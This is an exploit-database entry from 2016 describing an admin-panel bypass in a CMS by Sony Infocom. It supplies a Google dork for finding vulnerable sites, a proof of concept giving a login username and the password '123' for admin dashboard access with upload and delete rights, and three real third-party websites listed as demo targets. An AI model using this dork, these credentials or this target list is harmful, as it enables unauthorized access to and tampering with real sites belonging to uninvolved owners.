Sony Infocom CMS Admin Page Bypass

2016-07-28
ID: 87045
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Google Dork: inurl:"/administrator" or "/admin" "Design and Developed by : Sony Infocom" & inurl:"/administrator" or "/admin" "Designed by Sony Infocom"
# Date: 27-7-2016
# Exploit Author: Iran Security Team
# Discovered by : MR.BL4CK
# Vendor Homepage: http://www.sonyinfocom.com
# Tested on: Windows
# CVE : None

Describe :
This Exploit Allow The Attacker to bypass the adminpage.
Login to the admin Dashboard Give you Full Access to pload or Delete .....etc

PoC:
enter fill username or email and Password like the information below :
Username: [email protected]
Password: 123

Demo :
http://www.rcpindia.in/2015/administrator/
http://www.gautamcompetitioncoaching.com/administrator/
http://www.krishnaply.com/administrator/
1-4-2 (www02)